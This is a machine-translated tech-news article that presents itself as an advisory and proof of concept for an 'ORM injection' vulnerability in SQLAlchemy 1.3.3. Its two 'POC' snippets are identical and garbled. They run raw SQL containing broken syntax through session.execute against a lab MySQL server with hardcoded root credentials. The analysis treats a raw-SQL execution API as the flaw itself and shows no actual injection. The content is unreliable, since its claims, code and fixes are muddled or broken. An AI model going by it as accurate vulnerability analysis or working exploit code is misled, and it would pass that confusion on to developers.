Shulou(Shulou.com)06/02 Report--

The analysis process of Python sqlalchemy ORM injection vulnerability, in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Introduction:

SQLAlchemy is a Python SQL toolkit and database object mapping framework.

Impact:

There is an ORM injection vulnerability in SQLAlchemy version 1.3.3, which can be exploited by an attacker to obtain database sensitive information.

Security level:

High

Vulnerability number:

CNVD-2019-17301

Analysis:

1. Filter and intercept non-compliant SQL statements.

2. The so-called SAQL injection refers to the lack of effective verification of the data in SQLAlchemy, which leads to malicious data entering the application.

Reproduce environment:

PHPStudy 2018 php 5.4.45

SQLAlchemy 1.3.3

Python3

Environment building:

PHPStudy 2018

Https://www.cr173.com/soft/838278.html

SQLAlchemy 1.3.3

Pip install MySQL-pythonPip install SQLAlchemy

Vulnerability analysis:

In sqlalchemy.orm.session.sessionmaker, this is the database connection session.

Vulnerability entry location: line 608 of sqlalchemy\ orm\ session.py, which is the object where the data connects to the session.

Vulnerability entry method location: sqlalchemy\ orm\ session.py line 1137, enter the method of executing the SQL statement.

Moving on to the method code, line 1267 executes the SQL statement.

Execute () is an interface for SQL statement execution that allows arbitrary SQL statements to be executed without effective filtering for SQL injection.

Verify:

POC_01

From sqlalchemy import create_enginefrom sqlalchemy.orm import sessionmakerimport sqlalchemyprint ("sqlalchemy_version:", sqlalchemy.__version__)

Engine = create_engine ('mysql://root:123456@192.168.56.101:3306/mysql?charset=utf8') DB_Session = sessionmaker (bind=engine) session = DB_Session () session.execute (' use mysql;') print (session.execute ("" select * from user where User='root' *; ") .fetchall ())

Screenshot _ 01

POC_02

From sqlalchemy import create_enginefrom sqlalchemy.orm import sessionmakerimport sqlalchemyprint ("sqlalchemy_version:", sqlalchemy.__version__)

Engine = create_engine ('mysql://root:123456@192.168.56.101:3306/mysql?charset=utf8') DB_Session = sessionmaker (bind=engine) session = DB_Session () session.execute (' use mysql;') print (session.execute ("" select * from user where User='root' *; ") .fetchall ())

Screenshot _ 02

Repair recommendations:

1. Filter non-predefined stitching characters, such as too many quotation marks, @, colons, semicolons, etc.

2. Use effective safety protection equipment

3. The use of this interface is prohibited in development management.

The answers to the questions about the analysis process of Python sqlalchemy ORM injection vulnerabilities are shared here. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.